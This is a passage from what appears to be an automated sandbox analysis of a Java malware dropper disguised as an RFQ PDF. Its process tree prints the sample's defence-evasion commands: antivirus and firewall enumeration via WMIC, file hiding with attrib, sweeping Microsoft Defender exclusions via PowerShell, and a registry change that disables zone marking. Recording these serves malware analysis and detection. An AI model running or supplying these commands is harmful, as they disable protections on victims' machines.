PID 1436 wrote to memory of 1240	1436	java.exe	184
PID 1436 wrote to memory of 1240	1436	java.exe	184
PID 1240 wrote to memory of 1464	1240	cmd.exe	185
PID 1240 wrote to memory of 1464	1240	cmd.exe	185
PID 1240 wrote to memory of 1464	1240	cmd.exe	185
PID 1240 wrote to memory of 852	1240	cmd.exe	186
PID 1240 wrote to memory of 852	1240	cmd.exe	186
PID 1240 wrote to memory of 852	1240	cmd.exe	186
PID 1436 wrote to memory of 1056	1436	java.exe	187
PID 1436 wrote to memory of 1056	1436	java.exe	187
PID 1436 wrote to memory of 1056	1436	java.exe	187
PID 1436 wrote to memory of 1732	1436	java.exe	188
PID 1436 wrote to memory of 1732	1436	java.exe	188
PID 1436 wrote to memory of 1732	1436	java.exe	188
PID 1056 wrote to memory of 1820	1056	cmd.exe	189
PID 1056 wrote to memory of 1820	1056	cmd.exe	189
PID 1056 wrote to memory of 1820	1056	cmd.exe	189
PID 1056 wrote to memory of 1272	1056	cmd.exe	190
PID 1056 wrote to memory of 1272	1056	cmd.exe	190
PID 1056 wrote to memory of 1272	1056	cmd.exe	190
PID 1436 wrote to memory of 1988	1436	java.exe	192
PID 1436 wrote to memory of 1988	1436	java.exe	192
PID 1436 wrote to memory of 1988	1436	java.exe	192
PID 1988 wrote to memory of 1516	1988	cmd.exe	193
PID 1988 wrote to memory of 1516	1988	cmd.exe	193
PID 1988 wrote to memory of 1516	1988	cmd.exe	193
PID 1988 wrote to memory of 2076	1988	cmd.exe	194
PID 1988 wrote to memory of 2076	1988	cmd.exe	194
PID 1988 wrote to memory of 2076	1988	cmd.exe	194
PID 1436 wrote to memory of 2012	1436	java.exe	195
PID 1436 wrote to memory of 2012	1436	java.exe	195
PID 1436 wrote to memory of 2012	1436	java.exe	195
PID 2012 wrote to memory of 652	2012	cmd.exe	196
PID 2012 wrote to memory of 652	2012	cmd.exe	196
PID 2012 wrote to memory of 652	2012	cmd.exe	196
PID 2012 wrote to memory of 2112	2012	cmd.exe	197
PID 2012 wrote to memory of 2112	2012	cmd.exe	197
PID 2012 wrote to memory of 2112	2012	cmd.exe	197
PID 1436 wrote to memory of 2152	1436	java.exe	198
PID 1436 wrote to memory of 2152	1436	java.exe	198
PID 1436 wrote to memory of 2152	1436	java.exe	198
PID 2152 wrote to memory of 2176	2152	cmd.exe	199
PID 2152 wrote to memory of 2176	2152	cmd.exe	199
PID 2152 wrote to memory of 2176	2152	cmd.exe	199
PID 2152 wrote to memory of 2164	2152	cmd.exe	200
PID 2152 wrote to memory of 2164	2152	cmd.exe	200
PID 2152 wrote to memory of 2164	2152	cmd.exe	200
PID 1436 wrote to memory of 1836	1436	java.exe	201
PID 1436 wrote to memory of 1836	1436	java.exe	201
PID 1436 wrote to memory of 1836	1436	java.exe	201
PID 1836 wrote to memory of 1840	1836	cmd.exe	202
PID 1836 wrote to memory of 1840	1836	cmd.exe	202
PID 1836 wrote to memory of 1840	1836	cmd.exe	202
PID 1836 wrote to memory of 2200	1836	cmd.exe	203
PID 1836 wrote to memory of 2200	1836	cmd.exe	203
PID 1836 wrote to memory of 2200	1836	cmd.exe	203
PID 1436 wrote to memory of 2208	1436	java.exe	204
PID 1436 wrote to memory of 2208	1436	java.exe	204
PID 1436 wrote to memory of 2208	1436	java.exe	204
PID 2208 wrote to memory of 2228	2208	cmd.exe	205
PID 2208 wrote to memory of 2228	2208	cmd.exe	205
PID 2208 wrote to memory of 2228	2208	cmd.exe	205
PID 1436 wrote to memory of 2336	1436	java.exe	206
PID 1436 wrote to memory of 2336	1436	java.exe	206
PID 1436 wrote to memory of 2336	1436	java.exe	206
PID 2208 wrote to memory of 2284	2208	cmd.exe	207
PID 2208 wrote to memory of 2284	2208	cmd.exe	207
PID 2208 wrote to memory of 2284	2208	cmd.exe	207
PID 1436 wrote to memory of 2444	1436	java.exe	209
PID 1436 wrote to memory of 2444	1436	java.exe	209
PID 1436 wrote to memory of 2444	1436	java.exe	209
PID 2444 wrote to memory of 2480	2444	cmd.exe	210
PID 2444 wrote to memory of 2480	2444	cmd.exe	210
PID 2444 wrote to memory of 2480	2444	cmd.exe	210
PID 2444 wrote to memory of 2492	2444	cmd.exe	211
PID 2444 wrote to memory of 2492	2444	cmd.exe	211
PID 2444 wrote to memory of 2492	2444	cmd.exe	211
PID 1436 wrote to memory of 2532	1436	java.exe	212
PID 1436 wrote to memory of 2532	1436	java.exe	212
PID 1436 wrote to memory of 2532	1436	java.exe	212
PID 2532 wrote to memory of 2520	2532	cmd.exe	213
PID 2532 wrote to memory of 2520	2532	cmd.exe	213
PID 2532 wrote to memory of 2520	2532	cmd.exe	213
PID 2532 wrote to memory of 2536	2532	cmd.exe	214
PID 2532 wrote to memory of 2536	2532	cmd.exe	214
PID 2532 wrote to memory of 2536	2532	cmd.exe	214
PID 1436 wrote to memory of 2644	1436	java.exe	215
PID 1436 wrote to memory of 2644	1436	java.exe	215
PID 1436 wrote to memory of 2644	1436	java.exe	215
PID 2644 wrote to memory of 2672	2644	cmd.exe	216
PID 2644 wrote to memory of 2672	2644	cmd.exe	216
PID 2644 wrote to memory of 2672	2644	cmd.exe	216
PID 2644 wrote to memory of 2648	2644	cmd.exe	217
PID 2644 wrote to memory of 2648	2644	cmd.exe	217
PID 2644 wrote to memory of 2648	2644	cmd.exe	217
PID 1436 wrote to memory of 1080	1436	java.exe	218
PID 1436 wrote to memory of 1080	1436	java.exe	218
PID 1436 wrote to memory of 1080	1436	java.exe	218
PID 1080 wrote to memory of 2668	1080	cmd.exe	219
PID 1080 wrote to memory of 2668	1080	cmd.exe	219
PID 1080 wrote to memory of 2668	1080	cmd.exe	219
PID 1080 wrote to memory of 2716	1080	cmd.exe	220
PID 1080 wrote to memory of 2716	1080	cmd.exe	220
PID 1080 wrote to memory of 2716	1080	cmd.exe	220
PID 1436 wrote to memory of 1908	1436	java.exe	221
PID 1436 wrote to memory of 1908	1436	java.exe	221
PID 1436 wrote to memory of 1908	1436	java.exe	221
PID 1436 wrote to memory of 2144	1436	java.exe	222
PID 1436 wrote to memory of 2144	1436	java.exe	222
PID 1436 wrote to memory of 2144	1436	java.exe	222
PID 1908 wrote to memory of 2620	1908	cmd.exe	223
PID 1908 wrote to memory of 2620	1908	cmd.exe	223
PID 1908 wrote to memory of 2620	1908	cmd.exe	223
PID 1908 wrote to memory of 2272	1908	cmd.exe	224
PID 1908 wrote to memory of 2272	1908	cmd.exe	224
PID 1908 wrote to memory of 2272	1908	cmd.exe	224
PID 1436 wrote to memory of 1748	1436	java.exe	226
PID 1436 wrote to memory of 1748	1436	java.exe	226
PID 1436 wrote to memory of 1748	1436	java.exe	226
PID 1748 wrote to memory of 2148	1748	cmd.exe	227
PID 1748 wrote to memory of 2148	1748	cmd.exe	227
PID 1748 wrote to memory of 2148	1748	cmd.exe	227
PID 1748 wrote to memory of 1676	1748	cmd.exe	228
PID 1748 wrote to memory of 1676	1748	cmd.exe	228
PID 1748 wrote to memory of 1676	1748	cmd.exe	228
PID 1436 wrote to memory of 2108	1436	java.exe	229
PID 1436 wrote to memory of 2108	1436	java.exe	229
PID 1436 wrote to memory of 2108	1436	java.exe	229
PID 2108 wrote to memory of 2792	2108	cmd.exe	230
PID 2108 wrote to memory of 2792	2108	cmd.exe	230
PID 2108 wrote to memory of 2792	2108	cmd.exe	230
PID 2108 wrote to memory of 1032	2108	cmd.exe	231
PID 2108 wrote to memory of 1032	2108	cmd.exe	231
PID 2108 wrote to memory of 1032	2108	cmd.exe	231
PID 1436 wrote to memory of 1392	1436	java.exe	232
PID 1436 wrote to memory of 1392	1436	java.exe	232
PID 1436 wrote to memory of 1392	1436	java.exe	232
PID 1392 wrote to memory of 2748	1392	cmd.exe	233
PID 1392 wrote to memory of 2748	1392	cmd.exe	233
PID 1392 wrote to memory of 2748	1392	cmd.exe	233
PID 1392 wrote to memory of 2124	1392	cmd.exe	234
PID 1392 wrote to memory of 2124	1392	cmd.exe	234
PID 1392 wrote to memory of 2124	1392	cmd.exe	234
PID 1436 wrote to memory of 828	1436	java.exe	235
PID 1436 wrote to memory of 828	1436	java.exe	235
PID 1436 wrote to memory of 828	1436	java.exe	235
PID 1436 wrote to memory of 2084	1436	java.exe	236
PID 1436 wrote to memory of 2084	1436	java.exe	236
PID 1436 wrote to memory of 2084	1436	java.exe	236
PID 828 wrote to memory of 2828	828	cmd.exe	238
PID 828 wrote to memory of 2828	828	cmd.exe	238
PID 828 wrote to memory of 2828	828	cmd.exe	238
PID 828 wrote to memory of 2804	828	cmd.exe	239
PID 828 wrote to memory of 2804	828	cmd.exe	239
PID 828 wrote to memory of 2804	828	cmd.exe	239
PID 1436 wrote to memory of 2848	1436	java.exe	240
PID 1436 wrote to memory of 2848	1436	java.exe	240
PID 1436 wrote to memory of 2848	1436	java.exe	240
PID 2848 wrote to memory of 1572	2848	cmd.exe	241
PID 2848 wrote to memory of 1572	2848	cmd.exe	241
PID 2848 wrote to memory of 1572	2848	cmd.exe	241
PID 2848 wrote to memory of 1904	2848	cmd.exe	242
PID 2848 wrote to memory of 1904	2848	cmd.exe	242
PID 2848 wrote to memory of 1904	2848	cmd.exe	242
PID 1436 wrote to memory of 1956	1436	java.exe	243
PID 1436 wrote to memory of 1956	1436	java.exe	243
PID 1436 wrote to memory of 1956	1436	java.exe	243
PID 1956 wrote to memory of 2852	1956	cmd.exe	244
PID 1956 wrote to memory of 2852	1956	cmd.exe	244
PID 1956 wrote to memory of 2852	1956	cmd.exe	244
PID 1956 wrote to memory of 2888	1956	cmd.exe	245
PID 1956 wrote to memory of 2888	1956	cmd.exe	245
PID 1956 wrote to memory of 2888	1956	cmd.exe	245
PID 1436 wrote to memory of 2896	1436	java.exe	246
PID 1436 wrote to memory of 2896	1436	java.exe	246
PID 1436 wrote to memory of 2896	1436	java.exe	246
PID 1436 wrote to memory of 2940	1436	java.exe	247
PID 1436 wrote to memory of 2940	1436	java.exe	247
PID 1436 wrote to memory of 2940	1436	java.exe	247
PID 2896 wrote to memory of 2996	2896	cmd.exe	249
PID 2896 wrote to memory of 2996	2896	cmd.exe	249
PID 2896 wrote to memory of 2996	2896	cmd.exe	249
PID 2896 wrote to memory of 3032	2896	cmd.exe	250
PID 2896 wrote to memory of 3032	2896	cmd.exe	250
PID 2896 wrote to memory of 3032	2896	cmd.exe	250
PID 1436 wrote to memory of 3044	1436	java.exe	251
PID 1436 wrote to memory of 3044	1436	java.exe	251
PID 1436 wrote to memory of 3044	1436	java.exe	251
PID 3044 wrote to memory of 2948	3044	cmd.exe	252
PID 3044 wrote to memory of 2948	3044	cmd.exe	252
PID 3044 wrote to memory of 2948	3044	cmd.exe	252
PID 3044 wrote to memory of 2932	3044	cmd.exe	253
PID 3044 wrote to memory of 2932	3044	cmd.exe	253
PID 3044 wrote to memory of 2932	3044	cmd.exe	253
PID 1436 wrote to memory of 1892	1436	java.exe	254
PID 1436 wrote to memory of 1892	1436	java.exe	254
PID 1436 wrote to memory of 1892	1436	java.exe	254
PID 1892 wrote to memory of 1508	1892	cmd.exe	255
PID 1892 wrote to memory of 1508	1892	cmd.exe	255
PID 1892 wrote to memory of 1508	1892	cmd.exe	255
PID 1892 wrote to memory of 288	1892	cmd.exe	256
PID 1892 wrote to memory of 288	1892	cmd.exe	256
PID 1892 wrote to memory of 288	1892	cmd.exe	256
PID 1436 wrote to memory of 1052	1436	java.exe	257
PID 1436 wrote to memory of 1052	1436	java.exe	257
PID 1436 wrote to memory of 1052	1436	java.exe	257
PID 1052 wrote to memory of 1268	1052	cmd.exe	258
PID 1052 wrote to memory of 1268	1052	cmd.exe	258
PID 1052 wrote to memory of 1268	1052	cmd.exe	258
PID 1436 wrote to memory of 1788	1436	java.exe	259
PID 1436 wrote to memory of 1788	1436	java.exe	259
PID 1436 wrote to memory of 1788	1436	java.exe	259
PID 1052 wrote to memory of 1400	1052	cmd.exe	261
PID 1052 wrote to memory of 1400	1052	cmd.exe	261
PID 1052 wrote to memory of 1400	1052	cmd.exe	261
PID 1436 wrote to memory of 1092	1436	java.exe	262
PID 1436 wrote to memory of 1092	1436	java.exe	262
PID 1436 wrote to memory of 1092	1436	java.exe	262
PID 1092 wrote to memory of 1848	1092	cmd.exe	263
PID 1092 wrote to memory of 1848	1092	cmd.exe	263
PID 1092 wrote to memory of 1848	1092	cmd.exe	263
PID 1092 wrote to memory of 1960	1092	cmd.exe	264
PID 1092 wrote to memory of 1960	1092	cmd.exe	264
PID 1092 wrote to memory of 1960	1092	cmd.exe	264
PID 1436 wrote to memory of 1996	1436	java.exe	265
PID 1436 wrote to memory of 1996	1436	java.exe	265
PID 1436 wrote to memory of 1996	1436	java.exe	265
PID 1996 wrote to memory of 1368	1996	cmd.exe	266
PID 1996 wrote to memory of 1368	1996	cmd.exe	266
PID 1996 wrote to memory of 1368	1996	cmd.exe	266
PID 1996 wrote to memory of 1300	1996	cmd.exe	267
PID 1996 wrote to memory of 1300	1996	cmd.exe	267
PID 1996 wrote to memory of 1300	1996	cmd.exe	267
PID 1436 wrote to memory of 852	1436	java.exe	268
PID 1436 wrote to memory of 852	1436	java.exe	268
PID 1436 wrote to memory of 852	1436	java.exe	268
PID 852 wrote to memory of 760	852	cmd.exe	269
PID 852 wrote to memory of 760	852	cmd.exe	269
PID 852 wrote to memory of 760	852	cmd.exe	269
PID 852 wrote to memory of 1820	852	cmd.exe	270
PID 852 wrote to memory of 1820	852	cmd.exe	270
PID 852 wrote to memory of 1820	852	cmd.exe	270
PID 1436 wrote to memory of 1272	1436	java.exe	271
PID 1436 wrote to memory of 1272	1436	java.exe	271
PID 1436 wrote to memory of 1272	1436	java.exe	271
PID 1272 wrote to memory of 1512	1272	cmd.exe	272
PID 1272 wrote to memory of 1512	1272	cmd.exe	272
PID 1272 wrote to memory of 1512	1272	cmd.exe	272
PID 1272 wrote to memory of 1808	1272	cmd.exe	273
PID 1272 wrote to memory of 1808	1272	cmd.exe	273
PID 1272 wrote to memory of 1808	1272	cmd.exe	273
PID 1436 wrote to memory of 1992	1436	java.exe	274
PID 1436 wrote to memory of 1992	1436	java.exe	274
PID 1436 wrote to memory of 1992	1436	java.exe	274
PID 1992 wrote to memory of 652	1992	cmd.exe	275
PID 1992 wrote to memory of 652	1992	cmd.exe	275
PID 1992 wrote to memory of 652	1992	cmd.exe	275
PID 1992 wrote to memory of 2100	1992	cmd.exe	276
PID 1992 wrote to memory of 2100	1992	cmd.exe	276
PID 1992 wrote to memory of 2100	1992	cmd.exe	276
PID 1436 wrote to memory of 1828	1436	java.exe	277
PID 1436 wrote to memory of 1828	1436	java.exe	277
PID 1436 wrote to memory of 1828	1436	java.exe	277
PID 1436 wrote to memory of 1144	1436	java.exe	279
PID 1436 wrote to memory of 1144	1436	java.exe	279
PID 1436 wrote to memory of 1144	1436	java.exe	279
PID 1144 wrote to memory of 2080	1144	cmd.exe	280
PID 1144 wrote to memory of 2080	1144	cmd.exe	280
PID 1144 wrote to memory of 2080	1144	cmd.exe	280
PID 1144 wrote to memory of 2024	1144	cmd.exe	281
PID 1144 wrote to memory of 2024	1144	cmd.exe	281
PID 1144 wrote to memory of 2024	1144	cmd.exe	281
PID 1436 wrote to memory of 1732	1436	java.exe	282
PID 1436 wrote to memory of 1732	1436	java.exe	282
PID 1436 wrote to memory of 1732	1436	java.exe	282
PID 1732 wrote to memory of 2200	1732	cmd.exe	283
PID 1732 wrote to memory of 2200	1732	cmd.exe	283
PID 1732 wrote to memory of 2200	1732	cmd.exe	283
PID 1732 wrote to memory of 2392	1732	cmd.exe	284
PID 1732 wrote to memory of 2392	1732	cmd.exe	284
PID 1732 wrote to memory of 2392	1732	cmd.exe	284
PID 1436 wrote to memory of 2360	1436	java.exe	285
PID 1436 wrote to memory of 2360	1436	java.exe	285
PID 1436 wrote to memory of 2360	1436	java.exe	285
PID 2360 wrote to memory of 2508	2360	cmd.exe	286
PID 2360 wrote to memory of 2508	2360	cmd.exe	286
PID 2360 wrote to memory of 2508	2360	cmd.exe	286
PID 2360 wrote to memory of 2528	2360	cmd.exe	287
PID 2360 wrote to memory of 2528	2360	cmd.exe	287
PID 2360 wrote to memory of 2528	2360	cmd.exe	287
PID 1436 wrote to memory of 2572	1436	java.exe	288
PID 1436 wrote to memory of 2572	1436	java.exe	288
PID 1436 wrote to memory of 2572	1436	java.exe	288
PID 2572 wrote to memory of 2544	2572	cmd.exe	289
PID 2572 wrote to memory of 2544	2572	cmd.exe	289
PID 2572 wrote to memory of 2544	2572	cmd.exe	289
PID 2572 wrote to memory of 2576	2572	cmd.exe	290
PID 2572 wrote to memory of 2576	2572	cmd.exe	290
PID 2572 wrote to memory of 2576	2572	cmd.exe	290
PID 1436 wrote to memory of 2484	1436	java.exe	291
PID 1436 wrote to memory of 2484	1436	java.exe	291
PID 1436 wrote to memory of 2484	1436	java.exe	291
PID 2484 wrote to memory of 2436	2484	cmd.exe	292
PID 2484 wrote to memory of 2436	2484	cmd.exe	292
PID 2484 wrote to memory of 2436	2484	cmd.exe	292
PID 2484 wrote to memory of 2292	2484	cmd.exe	293
PID 2484 wrote to memory of 2292	2484	cmd.exe	293
PID 2484 wrote to memory of 2292	2484	cmd.exe	293
PID 1436 wrote to memory of 2088	1436	java.exe	294
PID 1436 wrote to memory of 2088	1436	java.exe	294
PID 1436 wrote to memory of 2088	1436	java.exe	294
PID 1436 wrote to memory of 2780	1436	java.exe	296
PID 1436 wrote to memory of 2780	1436	java.exe	296
PID 1436 wrote to memory of 2780	1436	java.exe	296
PID 2780 wrote to memory of 2708	2780	cmd.exe	297
PID 2780 wrote to memory of 2708	2780	cmd.exe	297
PID 2780 wrote to memory of 2708	2780	cmd.exe	297
PID 2780 wrote to memory of 2168	2780	cmd.exe	298
PID 2780 wrote to memory of 2168	2780	cmd.exe	298
PID 2780 wrote to memory of 2168	2780	cmd.exe	298
PID 1436 wrote to memory of 2204	1436	java.exe	299
PID 1436 wrote to memory of 2204	1436	java.exe	299
PID 1436 wrote to memory of 2204	1436	java.exe	299
PID 2204 wrote to memory of 2592	2204	cmd.exe	300
PID 2204 wrote to memory of 2592	2204	cmd.exe	300
PID 2204 wrote to memory of 2592	2204	cmd.exe	300
PID 2204 wrote to memory of 2812	2204	cmd.exe	301
PID 2204 wrote to memory of 2812	2204	cmd.exe	301
PID 2204 wrote to memory of 2812	2204	cmd.exe	301
PID 1436 wrote to memory of 2792	1436	java.exe	302
PID 1436 wrote to memory of 2792	1436	java.exe	302
PID 1436 wrote to memory of 2792	1436	java.exe	302
PID 2792 wrote to memory of 1032	2792	cmd.exe	303
PID 2792 wrote to memory of 1032	2792	cmd.exe	303
PID 2792 wrote to memory of 1032	2792	cmd.exe	303
PID 2792 wrote to memory of 2448	2792	cmd.exe	304
PID 2792 wrote to memory of 2448	2792	cmd.exe	304
PID 2792 wrote to memory of 2448	2792	cmd.exe	304
PID 1436 wrote to memory of 2416	1436	java.exe	305
PID 1436 wrote to memory of 2416	1436	java.exe	305
PID 1436 wrote to memory of 2416	1436	java.exe	305
PID 2416 wrote to memory of 2144	2416	cmd.exe	306
PID 2416 wrote to memory of 2144	2416	cmd.exe	306
PID 2416 wrote to memory of 2144	2416	cmd.exe	306
PID 2416 wrote to memory of 2740	2416	cmd.exe	307
PID 2416 wrote to memory of 2740	2416	cmd.exe	307
PID 2416 wrote to memory of 2740	2416	cmd.exe	307
PID 1436 wrote to memory of 2128	1436	java.exe	308
PID 1436 wrote to memory of 2128	1436	java.exe	308
PID 1436 wrote to memory of 2128	1436	java.exe	308
PID 2128 wrote to memory of 2824	2128	cmd.exe	309
PID 2128 wrote to memory of 2824	2128	cmd.exe	309
PID 2128 wrote to memory of 2824	2128	cmd.exe	309
PID 2128 wrote to memory of 2068	2128	cmd.exe	310
PID 2128 wrote to memory of 2068	2128	cmd.exe	310
PID 2128 wrote to memory of 2068	2128	cmd.exe	310
PID 1436 wrote to memory of 2728	1436	java.exe	311
PID 1436 wrote to memory of 2728	1436	java.exe	311
PID 1436 wrote to memory of 2728	1436	java.exe	311
PID 1436 wrote to memory of 1388	1436	java.exe	312
PID 1436 wrote to memory of 1388	1436	java.exe	312
PID 1436 wrote to memory of 1388	1436	java.exe	312
PID 2728 wrote to memory of 1572	2728	cmd.exe	313
PID 2728 wrote to memory of 1572	2728	cmd.exe	313
PID 2728 wrote to memory of 1572	2728	cmd.exe	313
PID 2728 wrote to memory of 2872	2728	cmd.exe	314
PID 2728 wrote to memory of 2872	2728	cmd.exe	314
PID 2728 wrote to memory of 2872	2728	cmd.exe	314
PID 1436 wrote to memory of 2888	1436	java.exe	316
PID 1436 wrote to memory of 2888	1436	java.exe	316
PID 1436 wrote to memory of 2888	1436	java.exe	316
PID 2888 wrote to memory of 1248	2888	cmd.exe	317
PID 2888 wrote to memory of 1248	2888	cmd.exe	317
PID 2888 wrote to memory of 1248	2888	cmd.exe	317
PID 2888 wrote to memory of 1744	2888	cmd.exe	318
PID 2888 wrote to memory of 1744	2888	cmd.exe	318
PID 2888 wrote to memory of 1744	2888	cmd.exe	318
PID 1436 wrote to memory of 2820	1436	java.exe	319
PID 1436 wrote to memory of 2820	1436	java.exe	319
PID 1436 wrote to memory of 2820	1436	java.exe	319
PID 2820 wrote to memory of 2992	2820	cmd.exe	320
PID 2820 wrote to memory of 2992	2820	cmd.exe	320
PID 2820 wrote to memory of 2992	2820	cmd.exe	320
PID 2820 wrote to memory of 3028	2820	cmd.exe	321
PID 2820 wrote to memory of 3028	2820	cmd.exe	321
PID 2820 wrote to memory of 3028	2820	cmd.exe	321
PID 1436 wrote to memory of 2584	1436	java.exe	322
PID 1436 wrote to memory of 2584	1436	java.exe	322
PID 1436 wrote to memory of 2584	1436	java.exe	322
PID 2584 wrote to memory of 2432	2584	cmd.exe	323
PID 2584 wrote to memory of 2432	2584	cmd.exe	323
PID 2584 wrote to memory of 2432	2584	cmd.exe	323
PID 2584 wrote to memory of 2320	2584	cmd.exe	324
PID 2584 wrote to memory of 2320	2584	cmd.exe	324
PID 2584 wrote to memory of 2320	2584	cmd.exe	324
PID 1436 wrote to memory of 2948	1436	java.exe	325
PID 1436 wrote to memory of 2948	1436	java.exe	325
PID 1436 wrote to memory of 2948	1436	java.exe	325
PID 2948 wrote to memory of 1880	2948	cmd.exe	326
PID 2948 wrote to memory of 1880	2948	cmd.exe	326
PID 2948 wrote to memory of 1880	2948	cmd.exe	326
PID 2948 wrote to memory of 2056	2948	cmd.exe	327
PID 2948 wrote to memory of 2056	2948	cmd.exe	327
PID 2948 wrote to memory of 2056	2948	cmd.exe	327
PID 1436 wrote to memory of 1508	1436	java.exe	328
PID 1436 wrote to memory of 1508	1436	java.exe	328
PID 1436 wrote to memory of 1508	1436	java.exe	328
PID 1508 wrote to memory of 2052	1508	cmd.exe	329
PID 1508 wrote to memory of 2052	1508	cmd.exe	329
PID 1508 wrote to memory of 2052	1508	cmd.exe	329
PID 1508 wrote to memory of 1124	1508	cmd.exe	330
PID 1508 wrote to memory of 1124	1508	cmd.exe	330
PID 1508 wrote to memory of 1124	1508	cmd.exe	330
PID 1436 wrote to memory of 2960	1436	java.exe	331
PID 1436 wrote to memory of 2960	1436	java.exe	331
PID 1436 wrote to memory of 2960	1436	java.exe	331
PID 2960 wrote to memory of 2940	2960	cmd.exe	332
PID 2960 wrote to memory of 2940	2960	cmd.exe	332
PID 2960 wrote to memory of 2940	2960	cmd.exe	332
PID 1436 wrote to memory of 1484	1436	java.exe	333
PID 1436 wrote to memory of 1484	1436	java.exe	333
PID 1436 wrote to memory of 1484	1436	java.exe	333
PID 2960 wrote to memory of 628	2960	cmd.exe	335
PID 2960 wrote to memory of 628	2960	cmd.exe	335
PID 2960 wrote to memory of 628	2960	cmd.exe	335
PID 1436 wrote to memory of 1960	1436	java.exe	336
PID 1436 wrote to memory of 1960	1436	java.exe	336
PID 1436 wrote to memory of 1960	1436	java.exe	336
PID 1960 wrote to memory of 1460	1960	cmd.exe	337
PID 1960 wrote to memory of 1460	1960	cmd.exe	337
PID 1960 wrote to memory of 1460	1960	cmd.exe	337
PID 1960 wrote to memory of 1356	1960	cmd.exe	338
PID 1960 wrote to memory of 1356	1960	cmd.exe	338
PID 1960 wrote to memory of 1356	1960	cmd.exe	338
PID 1436 wrote to memory of 1916	1436	java.exe	339
PID 1436 wrote to memory of 1916	1436	java.exe	339
PID 1436 wrote to memory of 1916	1436	java.exe	339
PID 1916 wrote to memory of 1412	1916	cmd.exe	340
PID 1916 wrote to memory of 1412	1916	cmd.exe	340
PID 1916 wrote to memory of 1412	1916	cmd.exe	340
PID 1916 wrote to memory of 1912	1916	cmd.exe	341
PID 1916 wrote to memory of 1912	1916	cmd.exe	341
PID 1916 wrote to memory of 1912	1916	cmd.exe	341
PID 1436 wrote to memory of 1980	1436	java.exe	342
PID 1436 wrote to memory of 1980	1436	java.exe	342
PID 1436 wrote to memory of 1980	1436	java.exe	342
PID 1980 wrote to memory of 1576	1980	cmd.exe	343
PID 1980 wrote to memory of 1576	1980	cmd.exe	343
PID 1980 wrote to memory of 1576	1980	cmd.exe	343
PID 1980 wrote to memory of 612	1980	cmd.exe	344
PID 1980 wrote to memory of 612	1980	cmd.exe	344
PID 1980 wrote to memory of 612	1980	cmd.exe	344
PID 1436 wrote to memory of 816	1436	java.exe	345
PID 1436 wrote to memory of 816	1436	java.exe	345
PID 1436 wrote to memory of 816	1436	java.exe	345
PID 816 wrote to memory of 1752	816	cmd.exe	346
PID 816 wrote to memory of 1752	816	cmd.exe	346
PID 816 wrote to memory of 1752	816	cmd.exe	346
PID 816 wrote to memory of 652	816	cmd.exe	347
PID 816 wrote to memory of 652	816	cmd.exe	347
PID 816 wrote to memory of 652	816	cmd.exe	347

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1792	attrib.exe
572	attrib.exe
1356	attrib.exe
1348	attrib.exe
612	attrib.exe
300	attrib.exe
1632	attrib.exe
1816	attrib.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Atlas Home Products Inc RFQ_pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1436
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1816
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1792
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:572
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1356
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1348
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:612
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:300
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1632
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1540
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1572
- C:\Windows\System32\reg.exe
